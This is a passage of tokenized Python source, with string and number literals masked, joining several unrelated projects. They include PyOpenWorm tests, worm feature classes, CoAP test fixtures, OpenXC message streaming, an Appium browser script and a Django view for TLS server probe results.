fields ] <EOL> authors = [ x [ <NUM_LIT:1> ] for x in fields if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> for a in authors : <EOL> self . author ( a ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> r = r [ <NUM_LIT:0> ] <EOL> if '<STR_LIT:title>' in r : <EOL> self . title ( r [ '<STR_LIT:title>' ] ) <EOL> if '<STR_LIT>' in r : <EOL> self . year ( r [ '<STR_LIT>' ] ) <EOL> def _pubmed_extract ( self ) : <EOL> def pmRequest ( pmid ) : <EOL> import xml . etree . ElementTree as ET <EOL> base = '<STR_LIT>' <EOL> url = base + "<STR_LIT>" % pmid <EOL> return ET . parse ( _url_request ( url ) ) <EOL> pmid = self . _fields [ '<STR_LIT>' ] <EOL> if pmid [ : <NUM_LIT:4> ] == '<STR_LIT:http>' : <EOL> pmid = _pubmed_uri_to_pmid ( pmid ) <EOL> pmid = int ( pmid ) <EOL> tree = pmRequest ( pmid ) <EOL> for x in tree . findall ( '<STR_LIT>' ) : <EOL> self . author ( x . text ) </s>
<s> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT:.>" ) <EOL> import unittest <EOL> import neuroml <EOL> import neuroml . writers as writers <EOL> import PyOpenWorm <EOL> from PyOpenWorm import * <EOL> import networkx <EOL> import rdflib <EOL> import rdflib as R <EOL> import pint as Q <EOL> import os <EOL> import subprocess as SP <EOL> import subprocess <EOL> import tempfile <EOL> import doctest <EOL> from glob import glob <EOL> from GraphDBInit import * <EOL> from DataTestTemplate import _DataTest <EOL> class ChannelTest ( _DataTest ) : <EOL> def test_DataUser ( self ) : <EOL> """<STR_LIT>""" <EOL> do = Channel ( '<STR_LIT>' , conf = self . config ) <EOL> self . assertTrue ( isinstance ( do , DataUser ) ) <EOL> def test_same_name_same_id ( self ) : <EOL> """<STR_LIT>""" <EOL> c = Channel ( name = "<STR_LIT>" ) <EOL> c1 = Channel ( name = "<STR_LIT>" ) <EOL> self . assertEqual ( c . identifier ( ) , c1 . identifier ( ) ) </s>
<s> import sys <EOL> import rdflib as R <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT:.>" ) <EOL> from PyOpenWorm . worm import Worm <EOL> from PyOpenWorm . network import Network <EOL> from PyOpenWorm . muscle import Muscle <EOL> from DataTestTemplate import _DataTest <EOL> class WormTest ( _DataTest ) : <EOL> """<STR_LIT>""" <EOL> def test_get_network ( self ) : <EOL> w = Worm ( ) <EOL> w . neuron_network ( Network ( ) ) <EOL> w . save ( ) <EOL> self . assertIsInstance ( Worm ( ) . get_neuron_network ( ) , Network ) <EOL> def test_muscles1 ( self ) : <EOL> w = Worm ( ) <EOL> w . muscle ( Muscle ( name = '<STR_LIT>' ) ) <EOL> w . muscle ( Muscle ( name = '<STR_LIT>' ) ) <EOL> w . save ( ) <EOL> self . assertIn ( Muscle ( name = '<STR_LIT>' ) , list ( Worm ( ) . muscles ( ) ) ) <EOL> self . assertIn ( Muscle ( name = '<STR_LIT>' ) , list ( Worm ( ) . muscles ( ) ) ) <EOL> def test_get_semantic_net ( self ) : <EOL> g0 = Worm ( ) . get_semantic_net ( ) <EOL> self . assertTrue ( isinstance ( g0 , R . ConjunctiveGraph ) ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . generic_features import Feature <EOL> from . . import utils <EOL> class Widths ( object ) : <EOL> """<STR_LIT>""" <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , features_ref ) : <EOL> """<STR_LIT>""" <EOL> nw = features_ref . nw <EOL> for partition in self . fields : <EOL> widths_in_partition = nw . get_partition ( partition , '<STR_LIT>' ) <EOL> setattr ( self , partition , np . mean ( widths_in_partition , <NUM_LIT:0> ) ) <EOL> @ classmethod <EOL> def from_disk ( cls , width_ref ) : <EOL> self = cls . __new__ ( cls ) <EOL> for partition in self . fields : <EOL> widths_in_partition = utils . _extract_time_from_disk ( width_ref , <EOL> partition ) <EOL> setattr ( self , partition , widths_in_partition ) <EOL> return self <EOL> def __eq__ ( self , other ) : <EOL> return ( <EOL> utils . correlation ( self . head , other . head , <EOL> '<STR_LIT>' ) and <EOL> utils . correlation ( self . midbody , other . midbody , <EOL> '<STR_LIT>' ) and <EOL> utils . correlation ( self . tail , other . tail , <EOL> '<STR_LIT>' ) ) <EOL> def __repr__ ( self ) : <EOL> return utils . print_object ( self ) <EOL> class Length ( Feature ) : <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> self . value = wf . nw . length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( wf . h , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self <EOL> class WidthSection ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name , partition_name ) : <EOL> """<STR_LIT>""" <EOL> self . name = feature_name <EOL> self . partition_name = partition_name <EOL> widths_in_partition = wf . nw . get_partition ( partition_name , '<STR_LIT>' ) <EOL> self . value = np . mean ( widths_in_partition , <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name , partition_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( <EOL> wf . h , [ '<STR_LIT>' , '<STR_LIT:width>' , partition_name ] ) <EOL> return self <EOL> class Area ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> self . value = wf . nw . area <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( wf . h , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self <EOL> class AreaPerLength ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> area = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> length = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> self . value = area / length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> return cls ( wf , feature_name ) <EOL> class WidthPerLength ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> width = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> length = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> self . value = width / length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> return cls ( wf , feature_name ) </s>
<s> import os <EOL> import sys <EOL> here = sys . path [ <NUM_LIT:0> ] <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( here , '<STR_LIT:..>' ) ) <EOL> import logging <EOL> import logging . handlers <EOL> import threading <EOL> import time <EOL> import pytest <EOL> import testUtils as utils <EOL> import snoopyDispatcher as snoopyDis <EOL> from coap import coap , coapDefines as d , coapResource <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . addHandler ( utils . NullHandler ( ) ) <EOL> LOG_MODULES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> IPADDRESS1 = '<STR_LIT>' <EOL> IPADDRESS2 = '<STR_LIT>' <EOL> RESOURCE = '<STR_LIT>' <EOL> DUMMYVAL = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def getTestModuleName ( request ) : <EOL> return request . module . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def getTestFunctionName ( request ) : <EOL> return request . function . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def loggingSetup ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> logHandler = logging . handlers . RotatingFileHandler ( <EOL> filename = '<STR_LIT>' . format ( moduleName ) , <EOL> mode = '<STR_LIT:w>' , <EOL> backupCount = <NUM_LIT:5> , <EOL> ) <EOL> logHandler . setFormatter ( <EOL> logging . Formatter ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> for loggerName in [ moduleName ] + LOG_MODULES : <EOL> temp = logging . getLogger ( loggerName ) <EOL> temp . setLevel ( logging . DEBUG ) <EOL> temp . addHandler ( logHandler ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> def loggingTeardown ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> output = [ ] <EOL> output += [ '<STR_LIT>' ] <EOL> for t in threading . enumerate ( ) : <EOL> output += [ '<STR_LIT>' . format ( t . name ) ] <EOL> output = '<STR_LIT:\n>' . join ( output ) <EOL> log . debug ( output ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> for loggerName in [ moduleName ] + LOG_MODULES : <EOL> temp = logging . getLogger ( loggerName ) <EOL> temp . handler = [ ] <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def logFixtureModule ( request ) : <EOL> loggingSetup ( request ) <EOL> f = lambda : loggingTeardown ( request ) <EOL> request . addfinalizer ( f ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def logFixture ( logFixtureModule , request ) : <EOL> log . debug ( '<STR_LIT>' . format ( getTestFunctionName ( request ) ) ) <EOL> return logFixtureModule <EOL> def snoppyTeardown ( snoppy ) : <EOL> snoppy . close ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def snoopyDispatcher ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> snoopy = snoopyDis . snoopyDispatcher ( '<STR_LIT>' . format ( moduleName ) ) <EOL> f = lambda : snoppyTeardown ( snoopy ) <EOL> request . addfinalizer ( f ) <EOL> class dummyResource ( coapResource . coapResource ) : <EOL> def __init__ ( self ) : <EOL> coapResource . coapResource . __init__ ( <EOL> self , <EOL> path = RESOURCE , <EOL> ) <EOL> def GET ( self , options = [ ] ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> respCode = d . COAP_RC_2_05_CONTENT <EOL> respOptions = [ ] <EOL> respPayload = DUMMYVAL <EOL> time . sleep ( <NUM_LIT> ) <EOL> return ( respCode , respOptions , respPayload ) <EOL> def twoEndPointsTeardown ( coap1 , coap2 ) : <EOL> coap1 . close ( ) <EOL> coap2 . close ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> assert len ( threading . enumerate ( ) ) == <NUM_LIT:1> <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def twoEndPoints ( request ) : <EOL> coap1 = coap . coap ( ipAddress = IPADDRESS1 , testing = True ) <EOL> coap2 = coap . coap ( ipAddress = IPADDRESS2 , testing = True ) <EOL> newResource = dummyResource ( ) <EOL> coap1 . addResource ( newResource ) <EOL> f = lambda : twoEndPointsTeardown ( coap1 , coap2 ) <EOL> request . addfinalizer ( f ) <EOL> return ( coap1 , coap2 ) <EOL> CONFIRMABLEFIXTURE = [ <EOL> True , <EOL> False , <EOL> ] <EOL> @ pytest . fixture ( params = CONFIRMABLEFIXTURE ) <EOL> def confirmableFixture ( request ) : <EOL> return request . param </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import json <EOL> from openxc . formats . base import VehicleMessageStreamer <EOL> class JsonStreamer ( VehicleMessageStreamer ) : <EOL> SERIALIZED_COMMAND_TERMINATOR = b"<STR_LIT:\x00>" <EOL> def parse_next_message ( self ) : <EOL> parsed_message = None <EOL> remainder = self . message_buffer <EOL> message = "<STR_LIT>" <EOL> if self . SERIALIZED_COMMAND_TERMINATOR in self . message_buffer : <EOL> message , _ , remainder = self . message_buffer . partition ( <EOL> self . SERIALIZED_COMMAND_TERMINATOR ) <EOL> try : <EOL> parsed_message = JsonFormatter . deserialize ( message ) <EOL> if not isinstance ( parsed_message , dict ) : <EOL> raise ValueError ( ) <EOL> except ValueError : <EOL> pass <EOL> self . message_buffer = remainder <EOL> return parsed_message <EOL> def serialize_for_stream ( self , message ) : <EOL> return JsonFormatter . serialize ( <EOL> message ) + self . SERIALIZED_COMMAND_TERMINATOR <EOL> class JsonFormatter ( object ) : <EOL> @ classmethod <EOL> def deserialize ( cls , message ) : <EOL> return json . loads ( message . decode ( "<STR_LIT:utf8>" ) ) <EOL> @ classmethod <EOL> def serialize ( cls , data ) : <EOL> return json . dumps ( data ) . encode ( "<STR_LIT:utf8>" ) <EOL> @ classmethod <EOL> def _validate ( cls , message ) : <EOL> """<STR_LIT>""" <EOL> valid = False <EOL> if ( ( '<STR_LIT:name>' in message and '<STR_LIT:value>' in message ) or <EOL> ( '<STR_LIT:id>' in message and '<STR_LIT:data>' in message ) ) : <EOL> valid = True <EOL> return valid </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import argparse <EOL> import logging <EOL> from openxc . generator . coder import CodeGenerator <EOL> from openxc . generator . message_sets import JsonMessageSet <EOL> from openxc . utils import fatal_error , load_json_from_search_path <EOL> from . common import configure_logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> DEFAULT_SEARCH_PATH = "<STR_LIT:.>" <EOL> def parse_options ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> group = parser . add_mutually_exclusive_group ( required = True ) <EOL> group . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> group . add_argument ( "<STR_LIT>" , <EOL> type = str , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> return parser . parse_args ( ) <EOL> def main ( ) : <EOL> configure_logging ( ) <EOL> arguments = parse_options ( ) <EOL> search_paths = arguments . search_paths or [ ] <EOL> search_paths . insert ( <NUM_LIT:0> , DEFAULT_SEARCH_PATH ) <EOL> message_sets = arguments . message_sets or [ ] <EOL> if arguments . super_set is not None : <EOL> super_set_data = load_json_from_search_path ( arguments . super_set , <EOL> arguments . search_paths ) <EOL> super_set_message_sets = super_set_data . get ( '<STR_LIT>' , [ ] ) <EOL> if len ( super_set_message_sets ) == <NUM_LIT:0> : <EOL> LOG . warning ( "<STR_LIT>" % <EOL> super_set_data . get ( '<STR_LIT:name>' , '<STR_LIT>' ) ) <EOL> message_sets . extend ( super_set_message_sets ) <EOL> generator = CodeGenerator ( search_paths ) <EOL> for filename in message_sets : <EOL> message_set = JsonMessageSet . parse ( filename , search_paths = search_paths , <EOL> skip_disabled_mappings = True ) <EOL> if not message_set . validate_messages ( ) or not message_set . validate_name ( ) : <EOL> fatal_error ( "<STR_LIT>" ) <EOL> generator . message_sets . append ( message_set ) <EOL> print ( generator . build_source ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> from . data_calc import DataCalc <EOL> class GearCalc ( DataCalc ) : <EOL> def __init__ ( self ) : <EOL> self . initialize_data ( ) <EOL> def initialize_data ( self ) : <EOL> self . gears = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . data = self . gears [ <NUM_LIT:0> ] <EOL> self . name = '<STR_LIT>' <EOL> def iterate ( self , snapshot ) : <EOL> gear = snapshot [ '<STR_LIT>' ] <EOL> self . data = self . gears [ gear ] </s>
<s> import time <EOL> from appium_helper import OperaAppiumDriver <EOL> from selenium . webdriver . common . by import By <EOL> from selenium . webdriver . support . ui import WebDriverWait <EOL> from selenium . webdriver . support import expected_conditions as ExpectedConditions <EOL> desired_caps = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> driver = OperaAppiumDriver ( '<STR_LIT>' , desired_caps ) <EOL> driver . skip_introduction_guide ( ) <EOL> driver . open_page_in_native_context ( "<STR_LIT>" ) <EOL> driver . switch_to . context ( '<STR_LIT>' ) <EOL> driver . get ( "<STR_LIT>" ) <EOL> text_input = WebDriverWait ( driver , <NUM_LIT:10> ) . until ( ExpectedConditions . element_to_be_clickable ( ( By . NAME , "<STR_LIT:q>" ) ) ) <EOL> text_input . send_keys ( '<STR_LIT>' ) <EOL> driver . switch_to . context ( '<STR_LIT>' ) <EOL> driver . close_native_dialog ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> driver . quit ( ) </s>
<s> from django . db import models <EOL> import probedb . probedata2 . models as ProbeData <EOL> import probedb . resultdb2 . models as Results <EOL> class UpdateBatchStatus ( models . Model ) : <EOL> batchname = models . CharField ( max_length = <NUM_LIT:100> , unique = True ) <EOL> enabled = models . BooleanField ( ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" . format ( unicode ( self . batchname ) , ( "<STR_LIT>" if self . enabled else "<STR_LIT>" ) ) <EOL> @ classmethod <EOL> def IsActive ( cls , batchname = "<STR_LIT>" ) : <EOL> return bool ( cls . objects . get ( batchname = batchname ) . enabled ) </s>
<s> from django import forms <EOL> import django <EOL> import os <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> import probedb . resultdb2 . models as Results <EOL> import probedb . probedata2 . models as ProbeData <EOL> from django . db import connection <EOL> from django . db . models import Q <EOL> from django . http import HttpResponse <EOL> result_summaries_info = { <EOL> "<STR_LIT>" : Results . ResultSummaryList . objects . all ( ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> def result_summary_info ( request , object_id ) : <EOL> """<STR_LIT>""" <EOL> object = get_object_or_404 ( Results . ResultSummaryList , pk = object_id ) <EOL> protocolfields = { } <EOL> for ( fieldname , text , cond ) in [ ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VERSION_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_EXTENSION_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VERANDEXT_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VEROREXT_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_BADVERSION ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_NOVERSION ) , <EOL> ] : <EOL> cond_item = object . conditions . get ( condition = cond ) <EOL> for ( ver ) in [ ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:3> , <NUM_LIT:11> ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) ] : <EOL> if ver == ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> title = "<STR_LIT>" <EOL> elif ver [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> title = "<STR_LIT>" % ( ver [ <NUM_LIT:1> ] - <NUM_LIT:2> , ) <EOL> else : <EOL> title = "<STR_LIT>" % ( ver [ <NUM_LIT:0> ] - <NUM_LIT:2> , ( ver [ <NUM_LIT:1> ] - <NUM_LIT:1> if ver [ <NUM_LIT:0> ] == <NUM_LIT:3> else ver [ <NUM_LIT:1> ] ) ) <EOL> Q = cond_item . resultentryprotocol_set . filter ( version_tested_major = ver [ <NUM_LIT:0> ] , version_tested_minor = ver [ <NUM_LIT:1> ] ) <EOL> protocolfields . setdefault ( str ( ver ) , { "<STR_LIT:title>" : title , "<STR_LIT>" : { } } ) [ "<STR_LIT>" ] [ fieldname ] = { "<STR_LIT>" : text , "<STR_LIT:count>" : Q . count ( ) } <EOL> summary_fields = [ ] <EOL> for ( fieldname , text , cond ) in [ ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGO ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGONONCOMPLIANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_NONRENEGO ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGOUNSTABLE ) , <EOL> ] : <EOL> cond_item = object . conditions . get ( condition = cond ) <EOL> Q = cond_item . resultentry_set . all ( ) <EOL> summary_fields . append ( { "<STR_LIT>" : text , "<STR_LIT:count>" : Q . count ( ) } ) <EOL> return render_to_response ( "<STR_LIT>" , { <EOL> "<STR_LIT:object>" : object , <EOL> "<STR_LIT>" : protocolfields , <EOL> "<STR_LIT>" : summary_fields , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> class ResultForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> run_to_use = forms . ModelChoiceField ( queryset = Results . ResultSummaryList . objects . order_by ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> protocol = forms . MultipleChoiceField ( required = False , choices = ( ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) + ProbeData . Server . PROTOCOL_LIST ) ) <EOL> conditions = forms . MultipleChoiceField ( required = False , choices = Results . ResultCondition . RESULTC_VALUES , widget = forms . SelectMultiple ( attrs = { "<STR_LIT:size>" : "<STR_LIT>" } ) ) <EOL> alexagroup = forms . ChoiceField ( required = False , choices = Results . ResultSummaryList . ALEXA_TYPE_VALUES ) <EOL> summary = forms . ChoiceField ( choices = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) + Results . ResultSummaryList . RESULT_TYPE_VALUES ) <EOL> run_to_limit = forms . ModelMultipleChoiceField ( required = False , <EOL> queryset = Results . ResultSummaryList . objects . order_by ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> widget = forms . SelectMultiple ( attrs = { "<STR_LIT:size>" : "<STR_LIT>" } ) ) <EOL> ciphers = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> for x in ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" ) . order_by ( "<STR_LIT>" ) : <EOL> ciphers . append ( ( x . ciphervalue , x . ciphername ) ) <EOL> ciphers_include = forms . MultipleChoiceField ( required = False , <EOL> choices = ciphers ) <EOL> ciphers_exclude = forms . MultipleChoiceField ( required = False , <EOL> choices = ciphers ) <EOL> def SearchResults_doSearch ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = ResultForm ( request . POST ) <EOL> elif request . method == '<STR_LIT:GET>' : <EOL> form = ResultForm ( request . GET ) <EOL> if form . is_valid ( ) : <EOL> filter = { } <EOL> summaries = { } <EOL> summary = form . cleaned_data [ "<STR_LIT>" ] <EOL> filters = form . cleaned_data [ "<STR_LIT>" ] <EOL> summary_entry = form . cleaned_data [ "<STR_LIT>" ] <EOL> protocol = form . cleaned_data [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in protocol or not protocol : <EOL> protocol = None <EOL> ciphers = [ ] <EOL> ciph = form . cleaned_data [ "<STR_LIT>" ] <EOL> if ciph : <EOL> for x in ciph : <EOL> if x in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> ciphers += ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" , ciphername__contains = "<STR_LIT:_>" + x + "<STR_LIT:_>" ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> else : <EOL> ciphers += ProbeData . CipherName . objects . filter ( ciphervalue = int ( x ) ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> ciphers = ProbeData . CipherName . objects . filter ( id__in = ciphers ) <EOL> ciphers_ex = [ ] <EOL> ciph = form . cleaned_data [ "<STR_LIT>" ] <EOL> if ciph : <EOL> for x in ciph : <EOL> if x in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> ciphers_ex += ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" , ciphername__contains = "<STR_LIT:_>" + x + "<STR_LIT:_>" ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> else : <EOL> ciphers_ex += ProbeData . CipherName . objects . filter ( ciphervalue = int ( x ) ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> ciphers_ex = ProbeData . CipherName . objects . filter ( id__in = ciphers_ex ) <EOL> alexagroup = form . cleaned_data [ "<STR_LIT>" ] <EOL> if not alexagroup : <EOL> alexagroup = - <NUM_LIT:1> <EOL> profile_q = None <EOL> profile = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> profile_q = Q ( result_entry__common_result = profile ) <EOL> else : <EOL> profile = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> profile_q = Q ( result_entry__common_result__basic_result = profile ) <EOL> else : <EOL> profile = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> profile_q = Q ( result_entry__common_result__fundamental_result = profile ) <EOL> extraparam = { } <EOL> if profile_q : <EOL> extraparam [ "<STR_LIT>" ] = profile_q <EOL> result = summary . GetAnalyze ( filter = dict ( [ ( Results . ResultSummaryList . QUERY_CONDITION , form . cleaned_data [ "<STR_LIT>" ] ) , <EOL> ( Results . ResultSummaryList . QUERY_ALEXA_RESTRICT , alexagroup ) , <EOL> ] + <EOL> ( [ ( Results . ResultSummaryList . QUERY_PROTOCOL_RESTRICT , protocol ) ] if protocol else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_RESTRICT_RUN , [ x . part_of_run_id for x in form . cleaned_data [ "<STR_LIT>" ] ] ) ] if form . cleaned_data [ "<STR_LIT>" ] else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_CIPHER , ciphers ) ] if ciphers else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_CIPHER_EXCLUDE , ciphers_ex ) ] if ciphers_ex else [ ] ) <EOL> ) , <EOL> summaries = { <EOL> "<STR_LIT:data>" : ( [ summary_entry ] if summary_entry != "<STR_LIT>" else [ ] ) , <EOL> } , <EOL> ** extraparam <EOL> ) <EOL> value_fun = { <EOL> Results . ResultSummaryList . RESULT_HOSTS : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_HOSTS_ALEXA : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_URLS_TEXT : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_HOST_RUNLIST : lambda x : ( x . servername . servername , x . servername . port ) , <EOL> Results . ResultSummaryList . RESULT_CONDITION : lambda x : dict ( Results . ResultCondition . RESULTC_VALUES ) [ x . condition ] , <EOL> Results . ResultSummaryList . RESULT_DOMAIN : lambda x : x . full_domain_name , <EOL> Results . ResultSummaryList . RESULT_IP : lambda x : x . full_ip_mask , <EOL> Results . ResultSummaryList . RESULT_PRIMARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_SHORTPRIMARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_SECONDARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_SHORTSECONDARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_CIPHER : lambda x : x . ciphername , <EOL> Results . ResultSummaryList . RESULT_CIPHERGROUP : lambda x : "<STR_LIT:U+0020>" . join ( sorted ( [ y . ciphername for y in x . cipher_suites . cipher_suites . all ( ) ] ) ) , <EOL> Results . ResultSummaryList . RESULT_PROTOCOLS : lambda x : dict ( Results . ResultCondition . RESULTC_VALUES ) [ x . condition ] , <EOL> Results . ResultSummaryList . RESULT_HOST_PROFILES : lambda x : x . key , <EOL> Results . ResultSummaryList . RESULT_HOST_BASEPROFILES : lambda x : x . key , <EOL> Results . ResultSummaryList . RESULT_HOST_FUNDPROFILES : lambda x : x . key , <EOL> } [ summary_entry ] if summary_entry != "<STR_LIT>" else None <EOL> data = result . get ( "<STR_LIT:data>" , [ ] ) if summary_entry != "<STR_LIT>" else [ ] <EOL> if not data : <EOL> data = [ ] <EOL> entries = [ ( <EOL> value_fun ( x ) , <EOL> x . filtered_count , <EOL> x . total_count , <EOL> ( float ( x . filtered_count ) / float ( x . total_count ) if x . total_count else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> x , <EOL> ) <EOL> for x in data 